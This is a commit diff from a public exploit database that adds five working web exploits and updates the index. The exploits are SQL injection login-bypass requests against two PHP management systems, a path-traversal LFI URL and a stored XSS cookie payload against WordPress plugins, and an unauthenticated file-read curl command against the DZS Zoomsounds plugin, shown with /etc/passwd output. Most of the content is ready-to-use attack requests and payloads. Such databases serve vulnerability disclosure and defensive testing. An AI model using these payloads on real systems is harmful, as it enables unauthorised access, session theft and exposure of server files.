DB: 2021-12-04
5 changes to exploits/shellcodes Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass Online Magazine Management System 1.0 - SQLi Authentication Bypass WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI) WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated) WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)
This commit is contained in:
Offensive Security
parent
1abdd81300
commit
34c9d56d78
6 changed files with 175 additions and 0 deletions
37
exploits/php/webapps/50560.txt
Normal file
37
exploits/php/webapps/50560.txt
Normal file
|
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass
|
||||
# Date: 01-12-2021
|
||||
# Exploit Author: Mohamed habib Smidi (Craniums)
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/15067/online-pre-ownedused-car-showroom-management-system-php-free-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/used_car_showroom.zip
|
||||
# Version: 1.0
|
||||
# Tested on: Ubuntu
|
||||
|
||||
# Description :
|
||||
|
||||
Admin panel authentication can be bypassed due to SQL injection vulnerability in the login form.
|
||||
|
||||
# Request :
|
||||
|
||||
POST /used_car_showroom/classes/Login.php?f=login HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0)
|
||||
Gecko/20100101 Firefox/93.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 49
|
||||
Origin: http://localhost
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Referer: http://localhost/used_car_showroom/admin/login.php
|
||||
Cookie: PHPSESSID=v0h6049m9ppunsh8vtfc8oj4p5
|
||||
Sec-Fetch-Dest: empty
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Site: same-origin
|
||||
|
||||
|
||||
username='+or+1%3D1+limit+1+--+-%2B&password=aaaa
|
||||
|
||||
--
|
||||
35
exploits/php/webapps/50561.txt
Normal file
35
exploits/php/webapps/50561.txt
Normal file
|
|
@ -0,0 +1,35 @@
|
|||
# Exploit Title: Online Magazine Management System 1.0 - SQLi Authentication Bypass
|
||||
# Date: 01-12-2021
|
||||
# Exploit Author: Mohamed habib Smidi (Craniums)
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/15061/online-magazine-management-system-php-free-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/magazines_0.zip
|
||||
# Version: 1.0
|
||||
# Tested on: Ubuntu
|
||||
|
||||
|
||||
# Description :
|
||||
|
||||
Admin panel authentication can be bypassed due to SQL injection vulnerability in the login form.
|
||||
|
||||
# Request :
|
||||
|
||||
POST /magazines/classes/Login.php?f=login HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0)
|
||||
Gecko/20100101 Firefox/93.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 49
|
||||
Origin: http://localhost
|
||||
Connection: close
|
||||
Referer: http://localhost/magazines/admin/login.php
|
||||
Cookie: PHPSESSID=863plvf7rpambpkmk2cipijgra
|
||||
Sec-Fetch-Dest: empty
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Site: same-origin
|
||||
|
||||
|
||||
username='+or+1%3D1+limit+1+--+-%2B&password=aaaa
|
||||
13
exploits/php/webapps/50562.txt
Normal file
13
exploits/php/webapps/50562.txt
Normal file
|
|
@ -0,0 +1,13 @@
|
|||
# Exploit Title: WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)
|
||||
# Exploit Author: Mohamed Magdy Abumusilm Aka m19o
|
||||
# Software: All-in-One Video Gallery plugin
|
||||
# Version: <= 2.4.9
|
||||
# Tested on: Windows,linux
|
||||
|
||||
Poc: https://example.com/wordpress/wp-admin/admin.php?page=all-in-one-video-gallery&tab=../../../../../poc
|
||||
|
||||
Decription : Authenticated user can exploit LFI vulnerability in tab parameter.
|
||||
|
||||
Vulnerable code block : https://i.ibb.co/hXRcSQp/1123.png
|
||||
|
||||
You can find a writeup at my blog : https://m19o.github.io/posts/How-i-found-my-first-0day/
|
||||
19
exploits/php/webapps/50563.txt
Normal file
19
exploits/php/webapps/50563.txt
Normal file
|
|
@ -0,0 +1,19 @@
|
|||
# Exploit Title: WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)
|
||||
# Date: 02/12/2021
|
||||
# Exploit Author: Abdurrahman Erkan (@erknabd)
|
||||
# Vendor Homepage: https://soliloquywp.com/
|
||||
# Software Link: https://wordpress.org/plugins/soliloquy-lite/
|
||||
# Version: 2.6.2
|
||||
# Tested on: Kali Linux 2021 - Firefox 78.7, Windows 10 - Brave 1.32.113, WordPress 5.8.2
|
||||
|
||||
# Proof of Concept:
|
||||
#
|
||||
# 1- Install and activate the Slider by Soliloquy 2.6.2 plugin.
|
||||
# 2- Open Soliloquy and use "Add New" button to add new post.
|
||||
# 3- Add payload to title. Payload: <script>alert(document.cookie)</script>
|
||||
# 4- Add any image in post.
|
||||
# 5- Publish the post.
|
||||
# 6- XSS has been triggered.
|
||||
#
|
||||
# Go to this url "http://localhost/wp-admin/post.php?post=1&action=edit" XSS will trigger. - For wordpress users.
|
||||
# Go to this url "http://localhost/?post_type=soliloquy&p=1" XSS will trigger. - For normal users.
|
||||
66
exploits/php/webapps/50564.txt
Normal file
66
exploits/php/webapps/50564.txt
Normal file
|
|
@ -0,0 +1,66 @@
|
|||
# Exploit Title: WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)
|
||||
# Google Dork: inurl:/wp-content/plugins/dzs-zoomsounds/
|
||||
# Date: 2/12/2021
|
||||
# Exploit Author: Uriel Yochpaz
|
||||
# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/
|
||||
# Software Link:
|
||||
# Version: 1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30, 2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10, 3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03, 5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45
|
||||
# Tested on: Linux (DZS Zoomsounds version 5.82)
|
||||
# CVE : CVE-2021-39316
|
||||
|
||||
The vulnerability allows a remote attacker to perform directory traversal attacks.
|
||||
The vulnerability exists due to input validation error when processing directory traversal sequences in the "link" parameter in the "dzsap_download" action. A remote attacker can send a specially crafted HTTP request and read arbitrary files on the system.
|
||||
|
||||
Mitigation:
|
||||
Install update from vendor's website.
|
||||
|
||||
Vulnerable software versions ZoomSounds:
|
||||
1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30,
|
||||
2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10,
|
||||
3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03,
|
||||
5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45
|
||||
|
||||
PoC:
|
||||
user@ubuntu:~$ curl "http://localhost/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd"
|
||||
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||
sync:x:4:65534:sync:/bin:/bin/sync
|
||||
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
||||
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||||
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||||
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
|
||||
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
|
||||
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
|
||||
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
|
||||
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|
||||
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
|
||||
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
|
||||
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
|
||||
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
|
||||
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
|
||||
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
|
||||
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
|
||||
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
|
||||
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
|
||||
syslog:x:104:108::/home/syslog:/bin/false
|
||||
_apt:x:105:65534::/nonexistent:/bin/false
|
||||
messagebus:x:106:110::/var/run/dbus:/bin/false
|
||||
uuidd:x:107:111::/run/uuidd:/bin/false
|
||||
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
|
||||
whoopsie:x:109:117::/nonexistent:/bin/false
|
||||
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
|
||||
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
|
||||
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
|
||||
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
|
||||
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
|
||||
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
|
||||
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
|
||||
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
|
||||
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
|
||||
saned:x:119:127::/var/lib/saned:/bin/false
|
||||
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
|
||||
user:x:1000:1000:user,,,:/home/user:/bin/bash
|
||||
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
|
||||
|
|
@ -44646,5 +44646,10 @@ id,file,description,date,author,type,platform,port
|
|||
50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
|
||||
50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php,
|
||||
50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
|
||||
50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
|
||||
50557,exploits/php/webapps/50557.txt,"Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting",1970-01-01,"Tushar Jadhav",webapps,php,
|
||||
50559,exploits/php/webapps/50559.py,"Advanced Comment System 1.0 - Remote Command Execution (RCE)",1970-01-01,"Murillo Mejias",webapps,php,
|
||||
50561,exploits/php/webapps/50561.txt,"Online Magazine Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
|
||||
50562,exploits/php/webapps/50562.txt,"WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)",1970-01-01,"Mohamed Magdy Abumusilm",webapps,php,
|
||||
50563,exploits/php/webapps/50563.txt,"WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Abdurrahman Erkan",webapps,php,
|
||||
50564,exploits/php/webapps/50564.txt,"WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Uriel Yochpaz",webapps,php,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue